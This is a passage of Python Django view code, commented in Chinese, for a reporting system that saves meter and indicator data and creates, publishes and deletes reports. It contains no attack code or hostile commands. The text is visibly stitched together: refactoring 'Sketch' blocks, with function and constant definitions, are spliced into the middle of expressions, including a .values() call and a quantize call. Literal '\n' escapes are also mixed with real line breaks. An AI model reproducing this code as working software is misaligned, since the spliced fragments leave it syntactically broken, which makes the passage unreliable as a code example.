request.user.is_authenticated():\n ret = {\n 'status': 1,\n 'data': '保存成功。'\n }\n savedata = request.POST.get('savedata')\n operationtype = request.POST.get('operationtype')\n cycletype = request.POST.get('cycletype', '')\n savedata = json.loads(savedata)\n reporting_date = request.POST.get('reporting_date', '')\n\n app = request.POST.get('app', '')\n funid = request.POST.get('funid', '')\n\n try:\n funid = int(funid)\n fun = Fun.objects.get(id=funid)\n work = fun.work\n app = int(app)\n except Exception as e:\n return JsonResponse({\n 'status': 0,\n 'data': str(e)\n })\n try:\n reporting_date = getreporting_date(reporting_date, cycletype)\n except:\n return JsonResponse({\n 'status': 0,\n 'data': '日期处理异常。'\n })\n\n # add\n tableyear = str(reporting_date.year)\n\n EntryTable = getmodels(\"Entrydata\", tableyear)\n MeterTable = getmodels(\"Meterdata\", tableyear)\n ExtractTable = getmodels(\"Extractdata\", tableyear)\n CalculateTable = getmodels(\"Calculatedata\", tableyear)\n tableList = {\"Entrydata\": EntryTable, \"Meterdata\": MeterTable, \"Extractdata\": ExtractTable,\n \"Calculatedata\": CalculateTable}\n\n save_query_data = []\n meterchangedata = []\n # 循环前执行所有查询,所有需要存储的键值存储在{}中,直接执行queryset(id=?).update(**kwargs)\n # 相比get(),save(),减少查询的操作,直接更新\n if operationtype == \"1\":\n save_query_data = getmodels(\"Meterdata\", str(reporting_date.year)).objects.exclude(state=\"9\").values(\n 'zerodata', 'twentyfourdata', 'metervalue', 'target__magnification', 'todayvalue', 'judgevalue',\n 'curvalue', 
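# Sketch: the four release blocks above and their mirrors in
# reporting_cancel_release differ only in the model name, the savedata key and
# the error label, so they can be table-driven (labels copied from the
# handlers above):
RELEASE_TABLES = [
    ("Meterdata", "1", "电表走字指标数据"),
    ("Entrydata", "15", "数据录入指标数据"),
    ("Extractdata", "16", "数据提取指标数据"),
    ("Calculatedata", "17", "数据计算指标数据"),
]

def set_release_state(savedata, year, new_state):
    failed = []
    for model_name, key, label in RELEASE_TABLES:
        try:
            getmodels(model_name, year).objects.exclude(state="9").filter(
                id__in=[int(x["id"]) for x in savedata[key]]
            ).update(releasestate=new_state)
        except Exception:
            failed.append(label)
    return failed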
'target__digit', 'target__datatype', 'curvaluedate', 'curvaluetext', 'cumulativemonth',\n 'cumulativequarter',\n 'cumulativehalfyear', 'cumulativeyear', 'id', 'releasestate'\n )\n if operationtype == \"15\":\n save_query_data = getmodels(\"Entrydata\", str(reporting_date.year)).objects.exclude(state=\"9\").values(\n 'todayvalue', 'judgevalue',\n 'curvalue', 'target__digit', 'target__datatype', 'curvaluedate', 'curvaluetext', 'cumulativemonth',\n 'cumulativequarter',\n 'cumulativehalfyear', 'cumulativeyear', 'id', 'releasestate'\n )\n if operationtype == \"16\":\n save_query_data = getmodels(\"Extractdata\", str(reporting_date.year)).objects.exclude(state=\"9\").values(\n 'todayvalue', 'judgevalue',\n 'curvalue', 'target__digit', 'target__datatype', 'curvaluedate', 'curvaluetext', 'cumulativemonth',\n 'cumulativequarter',\n 'cumulativehalfyear', 'cumulativeyear', 'id', 'releasestate'\n )\n if operationtype == \"17\":\n save_query_data = getmodels(\"Calculatedata\", str(reporting_date.year)).objects.exclude(state=\"9\").values(\n 'todayvalue', 'judgevalue',\n 'curvalue', 'target__digit', 'target__datatype', 'curvaluedate', 'curvaluetext', 'cumulativemonth',\n 'cumulativequarter',\n 'cumulativehalfyear', 'cumulativeyear', 'id', 'releasestate'\n )\n\n for curdata in savedata:\n result = dict()\n\n # save to dict\n single_save_query_data = {}\n for sqd in save_query_data:\n if sqd['id'] == curdata['id']:\n single_save_query_data = sqd\n break\n if single_save_query_data:\n if single_save_query_data['target__datatype'] == 'numbervalue':\n before_curvalue = float(single_save_query_data['curvalue'])\n after_curvalue = float(curdata[\"curvalue\"])\n # 更改了数据,记录数据\n try:\n if single_save_query_data['releasestate'] == '0':\n if before_curvalue != after_curvalue:\n before_curvalue = decimal.Decimal(str(before_curvalue)).quantize(decimal.Decimal(Digit(single_save_query_data['target__digit'])), rounding=decimal.ROUND_HALF_UP)\n after_curvalue = decimal.Decimal(str(after_curvalue)).\\\n quantize(decimal.Decimal(Digit(single_save_query_data['target__digit'])), rounding=decimal.ROUND_HALF_UP)\n\n update_obj = UpdateDataLog.objects.exclude(state='9').filter(datadate=reporting_date, target_id=curdata['target_id'])\n if update_obj.exists():\n update_obj.update(**{\n 'write_time': datetime.datetime.now(),\n 'before_curvalue': update_obj[0].raw_curvalue,\n 'after_curvalue': after_curvalue,\n })\n else:\n update_obj.create(**{\n 'cycletype': cycletype,\n 'operationtype': operationtype,\n 'datadate': reporting_date,\n 'write_time': datetime.datetime.now(),\n 'before_curvalue': before_curvalue,\n 'after_curvalue': after_curvalue,\n 'target_id': curdata['target_id'],\n 'adminapp_id': app,\n 'work': work,\n 'user_id': request.user.id,\n 'raw_curvalue': before_curvalue,\n })\n except Exception as e:\n print(e)\n try:\n result['todayvalue'] = float(curdata[\"todayvalue\"])\n result['todayvalue'] = decimal.Decimal(str(curdata['todayvalue'])).quantize(\n decimal.Decimal(Digit(single_save_query_data['target__digit'])),\n rounding=decimal.ROUND_HALF_UP)\n except Exception as e:\n pass\n try:\n result['judgevalue'] = float(curdata[\"judgevalue\"])\n result['judgevalue'] = decimal.Decimal(str(curdata['judgevalue'])).quantize(\n decimal.Decimal(Digit(single_save_query_data['target__digit'])),\n rounding=decimal.ROUND_HALF_UP)\n except Exception as e:\n pass\n try:\n result['curvalue'] = float(curdata[\"curvalue\"])\n result['curvalue'] = decimal.Decimal(str(curdata['curvalue'])).quantize(\n 
decimal.Decimal(Digit(single_save_query_data['target__digit'])),\n
                        rounding=decimal.ROUND_HALF_UP)\n
                except Exception as e:\n
                    pass\n
                if single_save_query_data['target__datatype'] == 'date':\n
                    try:\n
                        result['curvaluedate'] = datetime.datetime.strptime(curdata[\"curvaluedate\"],\n
                                                                            \"%Y-%m-%d %H:%M:%S\")\n
                    except Exception as e:\n
                        pass\n
                if single_save_query_data['target__datatype'] == 'text':\n
                    try:\n
                        result['curvaluetext'] = curdata[\"curvaluetext\"]\n
                    except Exception as e:\n
                        pass\n
                try:\n
                    result['zerodata'] = curdata[\"zerodata\"]\n
                except Exception as e:\n
                    pass\n
                try:\n
                    result['twentyfourdata'] = curdata[\"twentyfourdata\"]\n
                except Exception as e:\n
                    pass\n
                try:\n
                    result['metervalue'] = curdata[\"metervalue\"]\n
                except Exception as e:\n
                    pass\n
                try:\n
                    result['cumulativemonth'] = float(curdata[\"cumulativemonth\"])\n
                    result['cumulativemonth'] = round(result['cumulativemonth'],\n
                                                      single_save_query_data['target__digit'])\n
                except Exception as e:\n
                    pass\n
                try:\n
                    result['cumulativequarter'] = float(curdata[\"cumulativequarter\"])\n
                    result['cumulativequarter'] = round(result['cumulativequarter'],\n
                                                        single_save_query_data['target__digit'])\n
                except Exception as e:\n
                    pass\n
                try:\n
                    result['cumulativehalfyear'] = float(curdata[\"cumulativehalfyear\"])\n
                    result['cumulativehalfyear'] = round(result['cumulativehalfyear'],\n
                                                         single_save_query_data['target__digit'])\n
                except Exception as e:\n
                    pass\n
                try:\n
                    result['cumulativeyear'] = float(curdata[\"cumulativeyear\"])\n
                    result['cumulativeyear'] = round(result['cumulativeyear'], single_save_query_data['target__digit'])\n
                except Exception as e:\n
                    pass\n\n
                if operationtype == \"1\":\n
                    getmodels(\"Meterdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n
                        id=single_save_query_data['id']).update(**result)\n\n
                    # meter replacement: the POST carries readings for both the old and the new meter\n
                    if curdata[\"finalvalue\"]:\n
                        # write the magnification back to the target if it changed\n
                        try:\n
                            newmagnification = float(curdata[\"magnification\"])\n
                            if single_save_query_data['target__magnification'] != newmagnification:\n
                                try:\n
                                    tmp_metedata = getmodels(\"Meterdata\", str(reporting_date.year)).objects.exclude(\n
                                        state=\"9\").get(id=single_save_query_data['id'])\n
                                except Exception as e:\n
                                    pass\n
                                else:\n
                                    if tmp_metedata.target:\n
                                        tmp_metedata.target.magnification = newmagnification\n
                                        tmp_metedata.target.save()\n
                        except:\n
                            pass\n\n
                        meterchange_result = dict()\n\n
                        reporting_date = datetime.datetime.strptime(curdata[\"reporting_date\"], \"%Y-%m-%d\")\n
                        try:\n
                            meterchange_result['datadate'] = reporting_date\n
                        except:\n
                            pass\n
                        try:\n
                            meterchange_result['meterdata'] = single_save_query_data['id']\n
                        except:\n
                            pass\n
                        try:\n
                            # meterchange_result['oldtable_zerodata'] = float(curdata[\"oldtable_zerodata\"])\n
                            meterchange_result['oldtable_zerodata'] = decimal.Decimal(\n
                                str(float(curdata[\"oldtable_zerodata\"])))\n
                        except:\n
                            pass\n
                        try:\n
                            # meterchange_result['oldtable_twentyfourdata'] = float(curdata[\"oldtable_twentyfourdata\"])\n
                            meterchange_result['oldtable_twentyfourdata'] = decimal.Decimal(\n
                                str(float(curdata[\"oldtable_twentyfourdata\"])))\n
                        except:\n
                            pass\n
                        try:\n
                            # meterchange_result['oldtable_value'] = float(curdata[\"oldtable_value\"])\n
                            meterchange_result['oldtable_value'] = decimal.Decimal(\n
                                str(float(curdata[\"oldtable_value\"])))\n
                        except:\n
                            pass\n
                        try:\n
                            # meterchange_result['oldtable_magnification'] = float(curdata[\"oldtable_magnification\"])\n
                            meterchange_result['oldtable_magnification'] = decimal.Decimal(\n
                                str(float(curdata[\"oldtable_magnification\"])))\n
                        except:\n
                            pass\n
                        try:\n
                            # meterchange_result['oldtable_finalvalue'] = float(curdata[\"oldtable_finalvalue\"])\n
                            
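# Sketch: every quantize call in reporting_save repeats the same pattern.
# Assuming Digit(n) returns a pattern string such as "0.01" (as its use above
# implies), one helper keeps precision and rounding mode in a single place:
import decimal

def quantize_half_up(value, digit_pattern):
    return decimal.Decimal(str(value)).quantize(
        decimal.Decimal(digit_pattern), rounding=decimal.ROUND_HALF_UP)

# e.g. result['curvalue'] = quantize_half_up(curdata['curvalue'],
#                                            Digit(single_save_query_data['target__digit']))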
meterchange_result['oldtable_finalvalue'] = decimal.Decimal(\n str(float(curdata[\"oldtable_finalvalue\"])))\n except:\n pass\n try:\n # meterchange_result['newtable_zerodata'] = float(curdata[\"newtable_zerodata\"])\n meterchange_result['newtable_zerodata'] = decimal.Decimal(\n str(float(curdata[\"newtable_zerodata\"])))\n except:\n pass\n try:\n # meterchange_result['newtable_twentyfourdata'] = float(curdata[\"newtable_twentyfourdata\"])\n meterchange_result['newtable_twentyfourdata'] = decimal.Decimal(\n str(float(curdata[\"newtable_twentyfourdata\"])))\n except:\n pass\n try:\n # meterchange_result['newtable_value'] = float(curdata[\"newtable_value\"])\n meterchange_result['newtable_value'] = decimal.Decimal(\n str(float(curdata[\"newtable_value\"])))\n except:\n pass\n try:\n # meterchange_result['newtable_magnification'] = float(curdata[\"newtable_magnification\"])\n meterchange_result['newtable_magnification'] = decimal.Decimal(\n str(float(curdata[\"newtable_magnification\"])))\n except:\n pass\n try:\n # meterchange_result['newtable_finalvalue'] = float(curdata[\"newtable_finalvalue\"])\n meterchange_result['newtable_finalvalue'] = decimal.Decimal(\n str(float(curdata[\"newtable_finalvalue\"])))\n except:\n pass\n try:\n # meterchange_result['finalvalue'] = float(curdata[\"finalvalue\"])\n meterchange_result['finalvalue'] = decimal.Decimal(str(float(curdata[\"finalvalue\"])))\n except:\n pass\n\n mcd = Meterchangedata.objects.exclude(state=\"9\").filter(meterdata=single_save_query_data['id'])\n if mcd.exists():\n mcd.update(**meterchange_result)\n else:\n mcd.create(**meterchange_result)\n\n if operationtype == \"15\":\n getmodels(\"Entrydata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n id=single_save_query_data['id']).update(**result)\n if operationtype == \"16\":\n getmodels(\"Extractdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n id=single_save_query_data['id']).update(**result)\n if operationtype == \"17\":\n getmodels(\"Calculatedata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n id=single_save_query_data['id']).update(**result)\n # 保存时,重新累计\n try:\n target = Target.objects.get(id=int(curdata['target_id']))\n if target.cumulative in ['1', '2', '3', '4', '5']:\n cumulative = getcumulative(tableList, target, reporting_date, decimal.Decimal(str(curdata[\"curvalue\"])))\n operation_type = target.operationtype\n table_name = map_operation(operation_type)\n table_model = getmodels(table_name, str(reporting_date.year))\n td_data = table_model.objects.filter(target=target).filter(datadate=reporting_date).exclude(state=\"9\").last()\n td_data.cumulativemonth = cumulative[\"cumulativemonth\"]\n td_data.cumulativequarter = cumulative[\"cumulativequarter\"]\n td_data.cumulativehalfyear = cumulative[\"cumulativehalfyear\"]\n td_data.cumulativeyear = cumulative[\"cumulativeyear\"]\n td_data.save()\n except Exception as e:\n print(e)\n else:\n pass\n\n return JsonResponse(ret)\n\n\ndef report_submit_index(request, funid):\n \"\"\"\n 报表上报\n \"\"\"\n if request.user.is_authenticated():\n errors = []\n id = \"\"\n report_type_list = []\n report_type = \"\"\n adminapp = \"\"\n try:\n cur_fun = Fun.objects.filter(id=int(funid)).exclude(state='9')\n adminapp = cur_fun[0].app_id\n except:\n return HttpResponseRedirect(\"/index\")\n\n # 下拉框选项\n # 查看该应用有报表的类型\n report_types = ReportModel.objects.exclude(state=\"9\").order_by(\"sort\").filter(app_id=adminapp).values(\n \"report_type\"\n )\n all_report_types = [rt[\"report_type\"] 
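# Sketch: the meter-change block above converts eleven optional fields one
# try-block at a time. The same guard, looped over the field names used there,
# keeps missing or non-numeric fields out of the update:
import decimal

METERCHANGE_FIELDS = (
    "oldtable_zerodata", "oldtable_twentyfourdata", "oldtable_value",
    "oldtable_magnification", "oldtable_finalvalue",
    "newtable_zerodata", "newtable_twentyfourdata", "newtable_value",
    "newtable_magnification", "newtable_finalvalue", "finalvalue",
)

def collect_meterchange(curdata):
    out = {}
    for field in METERCHANGE_FIELDS:
        try:
            out[field] = decimal.Decimal(str(float(curdata[field])))
        except (KeyError, TypeError, ValueError):
            pass  # absent or non-numeric: leave the column untouched
    return out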
for rt in report_types]\n\n c_dict_index_1 = DictIndex.objects.filter(\n id=7).exclude(state='9')\n if c_dict_index_1.exists():\n c_dict_index_1 = c_dict_index_1[0]\n dict_list1 = c_dict_index_1.dictlist_set.exclude(state=\"9\")\n for i in dict_list1:\n if str(i.id) in all_report_types:\n report_type_list.append({\n \"report_name\": i.name,\n \"report_type_id\": i.id,\n })\n\n if not report_type:\n report_type = i.id\n all_app = App.objects.exclude(state=\"9\")\n all_app_list = []\n for app in all_app:\n all_app_list.append({\n \"app_id\": app.id,\n \"app_name\": app.name,\n })\n\n # datetimepicker\n date1 = datetime.datetime.now().replace(hour=0, minute=0, second=0, microsecond=0) + datetime.timedelta(\n days=-1)\n date2 = (datetime.datetime.now().replace(day=1, hour=0, minute=0, second=0, microsecond=0) + datetime.timedelta(\n days=-1)).replace(day=1)\n\n date3 = \"\"\n seasondate = \"\"\n now = datetime.datetime.now()\n month = (now.month - 1) - (now.month - 1) % 3 + 1\n now = (datetime.datetime.now().replace(month=month, day=1, hour=0, minute=0, second=0,\n microsecond=0) + datetime.timedelta(days=-1))\n year = now.strftime(\"%Y\")\n if now.month in (1, 2, 3):\n season = '第1季度'\n seasondate = year + '-' + season\n date3 = year + '-' + \"03-31\"\n if now.month in (4, 5, 6):\n season = '第2季度'\n seasondate = year + '-' + season\n date3 = year + '-' + \"06-30\"\n if now.month in (7, 8, 9):\n season = '第3季度'\n seasondate = year + '-' + season\n date3 = year + '-' + \"09-30\"\n if now.month in (10, 11, 12):\n season = '第4季度'\n seasondate = year + '-' + season\n date3 = year + '-' + \"12-31\"\n\n date4 = \"\"\n yeardate = \"\"\n now = datetime.datetime.now()\n month = (now.month - 1) - (now.month - 1) % 6 + 1\n now = (datetime.datetime.now().replace(month=month, day=1, hour=0, minute=0, second=0,\n microsecond=0) + datetime.timedelta(days=-1))\n year = now.strftime(\"%Y\")\n if now.month in (1, 2, 3, 4, 5, 6):\n season = '上半年'\n yeardate = year + '-' + season\n date4 = year + '-' + \"06-30\"\n if now.month in (7, 8, 9, 10, 11, 12):\n season = '下半年'\n yeardate = year + '-' + season\n date4 = year + '-' + \"12-31\"\n\n date5 = (datetime.datetime.now().replace(month=1, day=1, hour=0, minute=0, second=0,\n microsecond=0) + datetime.timedelta(days=-1)).replace(month=1, day=1)\n\n temp_dict = {\n \"22\": date1.strftime(\"%Y-%m-%d\"),\n \"23\": date2.strftime(\"%Y-%m\"),\n \"24\": date3,\n \"25\": date4,\n \"26\": date5.strftime(\"%Y\"),\n }\n return render(request, 'report_submit.html',\n {'username': request.user.userinfo.fullname,\n \"selected_report_type\": report_type,\n \"report_type_list\": report_type_list,\n \"all_app_list\": all_app_list,\n \"errors\": errors,\n \"id\": id,\n \"date\": json.dumps(temp_dict),\n \"dateday\": date1.strftime(\"%Y-%m-%d\"),\n \"seasondate\": seasondate,\n \"yeardate\": yeardate,\n \"adminapp\": adminapp,\n \"funid\": funid,\n \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef report_submit_data(request):\n if request.user.is_authenticated():\n result = []\n search_app = request.GET.get('search_app', '')\n search_date = request.GET.get('search_date', '')\n search_report_type = request.GET.get('search_report_type', '')\n\n # 时间的过滤\n if search_date:\n if search_report_type == \"22\":\n search_date = datetime.datetime.strptime(search_date, \"%Y-%m-%d\")\n elif search_report_type == \"23\":\n search_date = datetime.datetime.strptime(search_date, \"%Y-%m\")\n year = search_date.year\n month = search_date.month\n a, b 
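# Sketch: the season block above snaps "now" back to the previous quarter
# boundary with modular month arithmetic. The same computation isolated, with
# a worked example:
import datetime

def prev_quarter_end(now):
    qstart_month = (now.month - 1) - (now.month - 1) % 3 + 1  # 1, 4, 7 or 10
    qstart = now.replace(month=qstart_month, day=1, hour=0, minute=0,
                         second=0, microsecond=0)
    return qstart - datetime.timedelta(days=1)  # 2019-05-20 -> 2019-03-31 00:00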
= calendar.monthrange(year, month)\n search_date = datetime.datetime(year=year, month=month, day=b)\n elif search_report_type == \"24\":\n search_date = search_date\n elif search_report_type == \"25\":\n search_date = search_date\n elif search_report_type == \"26\":\n search_date = datetime.datetime.strptime(search_date, \"%Y\")\n search_date = search_date.replace(month=12, day=31)\n else:\n pass\n\n all_report = ReportModel.objects.exclude(state=\"9\").order_by(\"sort\").filter(report_type=search_report_type)\n curadminapp = App.objects.get(id=int(search_app))\n all_report = all_report.filter(app=curadminapp)\n\n # 报表服务器地址\n rs = ReportServer.objects.first()\n report_server = rs.report_server if rs else ''\n\n for report in all_report:\n # 报表类型\n report_type = report.report_type\n report_time = ''\n try:\n report_type_dict_list = DictList.objects.filter(id=int(report.report_type))\n if report_type_dict_list.exists():\n report_type_dict_list = report_type_dict_list[0]\n report_type = report_type_dict_list.name\n except:\n pass\n\n report_info_list = []\n\n current_report_info_set = report.reportinfo_set.exclude(state=\"9\")\n if current_report_info_set.exists():\n for report_info in current_report_info_set:\n report_info_list.append({\n \"report_info_name\": report_info.name,\n \"report_info_value\": report_info.default_value,\n \"report_info_id\": int(report_info.id),\n })\n\n # state判断 report_time/state==1\n report_submit_1 = report.reportsubmit_set.exclude(state=\"9\").filter(report_time=search_date, state=\"1\")\n report_submit_0 = report.reportsubmit_set.exclude(state=\"9\").filter(report_time=search_date, state=\"0\")\n\n if report_submit_1.exists():\n state = \"已发布\"\n person = report_submit_1[0].person\n write_time = report_submit_1[0].write_time.strftime('%Y-%m-%d')\n\n c_report_time = report_submit_1[0].report_time\n # 年 月 日 2019-01-01\n if c_report_time:\n if report_type == \"年报\":\n report_time = c_report_time.strftime('%Y')\n if report_type in [\"半年报\", \"季报\", \"日报\"]:\n report_time = c_report_time.strftime('%Y-%m-%d')\n if report_type == \"月报\":\n report_time = c_report_time.strftime('%Y-%m')\n c_report_info_list = []\n current_report_submit_info_set = report_submit_1[0].reportsubmitinfo_set.exclude(state=\"9\")\n for report_submit_info in current_report_submit_info_set:\n c_report_info_list.append({\n \"report_info_name\": report_submit_info.name,\n \"report_info_value\": report_submit_info.value,\n \"report_info_id\": int(report_submit_info.id),\n })\n report_info_list = c_report_info_list\n elif report_submit_0.exists():\n state = \"未发布\"\n person = report_submit_0[0].person\n write_time = report_submit_0[0].write_time.strftime('%Y-%m-%d')\n c_report_time = report_submit_0[0].report_time\n if c_report_time:\n if report_type == \"年报\":\n report_time = c_report_time.strftime('%Y')\n if report_type in [\"半年报\", \"季报\", \"日报\"]:\n report_time = c_report_time.strftime('%Y-%m-%d')\n if report_type == \"月报\":\n report_time = c_report_time.strftime('%Y-%m')\n c_report_info_list = []\n current_report_submit_info_set = report_submit_0[0].reportsubmitinfo_set.exclude(state=\"9\")\n for report_submit_info in current_report_submit_info_set:\n c_report_info_list.append({\n \"report_info_name\": report_submit_info.name,\n \"report_info_value\": report_submit_info.value,\n \"report_info_id\": int(report_submit_info.id),\n })\n report_info_list = c_report_info_list\n else:\n state = \"未创建\"\n person = str(request.user.userinfo.fullname) if request.user.userinfo else ''\n write_time = 
datetime.datetime.now().strftime('%Y-%m-%d')\n report_time = \"\"\n\n result.append({\n \"id\": report.id,\n \"name\": report.name,\n \"code\": report.code,\n \"file_name\": report.file_name,\n \"relative_file_name\": report.app.code + '/' + report.file_name,\n \"report_type\": report_type,\n \"report_type_id\": int(report.report_type) if report.report_type else \"\",\n \"app\": report.app.name,\n \"app_id\": report.app.id,\n \"report_type_num\": report.report_type,\n \"sort\": report.sort,\n \"report_info_list\": report_info_list,\n \"person\": person,\n \"write_time\": write_time,\n \"state\": state,\n \"report_time\": report_time,\n \"report_server\": report_server\n })\n return JsonResponse({\"data\": result})\n\n\ndef report_submit_save(request):\n if request.user.is_authenticated():\n # 新增/修改报表模型\n if request.method == \"POST\":\n result = {}\n person = request.POST.get(\"person\", \"\")\n write_time = request.POST.get(\"write_time\", \"\")\n report_model = request.POST.get(\"report_model\", \"\")\n app = request.POST.get(\"app\", \"\")\n post_type = request.POST.get(\"post_type\", \"\")\n report_time = request.POST.get(\"report_time\", \"\")\n\n write_time = datetime.datetime.strptime(write_time, \"%Y-%m-%d\") if write_time else None\n length_tag = report_time.count(\"-\")\n if length_tag == 0:\n report_time = datetime.datetime.strptime(report_time, \"%Y\") if report_time else None\n report_time = report_time.replace(month=12, day=31) if report_time else None\n elif length_tag == 1:\n report_time = datetime.datetime.strptime(report_time, \"%Y-%m\") if report_time else None\n a, b = calendar.monthrange(report_time.year, report_time.month) if report_time else None\n report_time = datetime.datetime(year=report_time.year, month=report_time.month,\n day=b) if report_time else None\n elif length_tag == 2:\n report_time = datetime.datetime.strptime(report_time, \"%Y-%m-%d\") if report_time else None\n else:\n result[\"res\"] = \"网络异常。\"\n return JsonResponse(result)\n\n report_info_num = 0\n for key in request.POST.keys():\n if \"report_info_\" in key:\n report_info_num += 1\n\n if report_model:\n report_model = int(report_model)\n\n current_report_submit = ReportSubmit.objects.exclude(state=\"9\").filter(report_model_id=report_model,\n report_time=report_time)\n # 新增\n if not current_report_submit.exists():\n try:\n report_submit_add = ReportSubmit()\n report_submit_add.report_model_id = report_model\n report_submit_add.app_id = app\n report_submit_add.person = person\n report_submit_add.state = \"0\"\n report_submit_add.write_time = write_time\n report_submit_add.report_time = report_time\n if post_type == \"submit\":\n report_submit_add.state = \"1\"\n report_submit_add.save()\n\n # report_info\n if report_info_num:\n range_num = int(report_info_num / 3)\n for i in range(0, range_num):\n report_submit_info = ReportSubmitInfo()\n report_info_name = request.POST.get(\n \"report_info_name_%d\" % (i + 1), \"\")\n report_info_default_value = request.POST.get(\n \"report_info_value_%d\" % (i + 1), \"\")\n if report_info_name:\n report_submit_info.name = report_info_name\n report_submit_info.value = report_info_default_value\n report_submit_info.report_submit = report_submit_add\n report_submit_info.save()\n result[\"res\"] = \"保存成功。\"\n except Exception as e:\n result[\"res\"] = \"网络异常。\"\n return JsonResponse(result)\n # 修改\n else:\n current_report_submit = current_report_submit[0]\n try:\n if post_type == \"submit\":\n current_report_submit.state = \"1\"\n current_report_submit.person = 
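# Sketch: report_submit_save, report_submit_all_tmp and report_submit_del all
# normalize report_time the same way: the dash count picks the granularity
# (0 = year, 1 = month, 2 = day) and year/month inputs are snapped to the last
# day of the period. As a single helper:
import calendar
import datetime

def parse_report_time(report_time):
    if not report_time:
        return None
    dashes = report_time.count("-")
    if dashes == 0:    # "2019"    -> 2019-12-31
        return datetime.datetime.strptime(report_time, "%Y").replace(month=12, day=31)
    if dashes == 1:    # "2019-02" -> 2019-02-28
        dt = datetime.datetime.strptime(report_time, "%Y-%m")
        return dt.replace(day=calendar.monthrange(dt.year, dt.month)[1])
    if dashes == 2:    # "2019-02-11" stays as given
        return datetime.datetime.strptime(report_time, "%Y-%m-%d")
    raise ValueError("unrecognized report_time: %r" % report_time)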
person\n current_report_submit.write_time = write_time\n current_report_submit.report_time = report_time\n current_report_submit.save()\n if report_info_num:\n range_num = int(report_info_num / 3)\n for i in range(0, range_num):\n report_info_id = request.POST.get(\n \"report_info_id_%d\" % (i + 1), \"\")\n report_info_name = request.POST.get(\n \"report_info_name_%d\" % (i + 1), \"\")\n report_info_value = request.POST.get(\n \"report_info_value_%d\" % (i + 1), \"\")\n temp_report_submit_info = ReportSubmitInfo.objects.exclude(state=\"9\").filter(\n id=int(report_info_id))\n if temp_report_submit_info.exists():\n temp_report_submit_info = temp_report_submit_info[0]\n temp_report_submit_info.name = report_info_name\n temp_report_submit_info.value = report_info_value\n temp_report_submit_info.save()\n result[\"res\"] = \"保存成功。\"\n except Exception as e:\n result[\"res\"] = \"网络异常。\"\n return JsonResponse(result)\n else:\n result[\"res\"] = \"网络异常。\"\n return JsonResponse(result)\n\n\ndef report_submit_all_tmp(request):\n if request.user.is_authenticated():\n # 新增报表模型\n if request.method == \"POST\":\n result = {}\n user_id = int(request.user.id)\n app = request.POST.get(\"app\", \"\")\n report_time = request.POST.get(\"report_time\", \"\")\n person = UserInfo.objects.exclude(state=\"9\").get(user_id=user_id).fullname\n write_time = request.POST.get(\"write_time\", \"\")\n write_time = datetime.datetime.strptime(write_time, \"%Y-%m-%d\") if write_time else None\n length_tag = report_time.count(\"-\")\n if length_tag == 0:\n report_time = datetime.datetime.strptime(report_time, \"%Y\") if report_time else None\n report_time = report_time.replace(month=12, day=31) if report_time else None\n elif length_tag == 1:\n report_time = datetime.datetime.strptime(report_time, \"%Y-%m\") if report_time else None\n a, b = calendar.monthrange(report_time.year, report_time.month) if report_time else None\n report_time = datetime.datetime(year=report_time.year, month=report_time.month,\n day=b) if report_time else None\n elif length_tag == 2:\n report_time = datetime.datetime.strptime(report_time, \"%Y-%m-%d\") if report_time else None\n else:\n result[\"res\"] = \"网络异常。\"\n return JsonResponse(result)\n report_model_list = request.POST.get(\"report_model_list\", \"\")\n report_model_list = json.loads(report_model_list)\n if report_model_list:\n for report_model_id in report_model_list:\n report_model = int(report_model_id)\n current_report_submit = ReportSubmit.objects.exclude(state=\"9\").filter(\n report_model_id=report_model, report_time=report_time)\n # 新增\n if not current_report_submit.exists():\n try:\n report_submit_add = ReportSubmit()\n report_submit_add.report_model_id = report_model\n report_submit_add.app_id = app\n report_submit_add.person = person\n report_submit_add.state = \"0\"\n report_submit_add.write_time = write_time\n report_submit_add.report_time = report_time\n report_submit_add.state = \"1\"\n report_submit_add.save()\n report_info = ReportInfo.objects.exclude(state=\"9\").filter(report_model_id=report_model)\n if report_info.exists():\n for i in report_info:\n report_submit_info = ReportSubmitInfo()\n report_submit_info.name = i.name\n report_submit_info.value = i.default_value\n report_submit_info.report_submit = report_submit_add\n report_submit_info.save()\n result[\"res\"] = \"发布成功。\"\n except Exception as e:\n print(e)\n result[\"res\"] = \"网络异常。\"\n return JsonResponse(result)\n # 修改\n else:\n current_report_submit = current_report_submit[0]\n try:\n 
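# Sketch: report_info rows are posted as three parallel keys per row
# (report_info_id_N / report_info_name_N / report_info_value_N), which is why
# report_info_num is divided by 3 above. Collecting them up front keeps the
# save loops flat (helper name illustrative):
def collect_report_infos(post):
    count = sum(1 for key in post if "report_info_" in key) // 3
    return [{
        "id": post.get("report_info_id_%d" % i, ""),
        "name": post.get("report_info_name_%d" % i, ""),
        "value": post.get("report_info_value_%d" % i, ""),
    } for i in range(1, count + 1)]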
current_report_submit.state = \"1\"\n current_report_submit.person = person\n current_report_submit.write_time = write_time\n current_report_submit.report_time = report_time\n current_report_submit.save()\n result[\"res\"] = \"发布成功。\"\n except Exception as e:\n result[\"res\"] = \"网络异常。\"\n return JsonResponse(result)\n else:\n result[\"res\"] = \"网络异常。\"\n return JsonResponse(result)\n\n\ndef report_submit_del(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n report_time = request.POST.get(\"report_time\", \"\")\n\n length_tag = report_time.count(\"-\")\n if length_tag == 0:\n report_time = datetime.datetime.strptime(report_time, \"%Y\") if report_time else None\n report_time = report_time.replace(month=12, day=31) if report_time else None\n elif length_tag == 1:\n report_time = datetime.datetime.strptime(report_time, \"%Y-%m\") if report_time else None\n a, b = calendar.monthrange(report_time.year, report_time.month) if report_time else None\n report_time = datetime.datetime(year=report_time.year, month=report_time.month,\n day=b) if report_time else None\n elif length_tag == 2:\n report_time = datetime.datetime.strptime(report_time, \"%Y-%m-%d\") if report_time else None\n else:\n return HttpResponse(0)\n\n try:\n id = int(id)\n except:\n raise Http404()\n report = ReportModel.objects.filter(id=id)\n\n if report.exists():\n report = report[0]\n # 删除关联report_submit\n report_submit_set = report.reportsubmit_set.exclude(state=\"9\").filter(report_time=report_time)\n if report_submit_set.exists():\n for i in report_submit_set:\n i.state = \"9\"\n i.save()\n else:\n # 未创建,不需要删除\n return HttpResponse(2)\n\n return HttpResponse(1)\n else:\n return HttpResponse(0)\n else:\n return 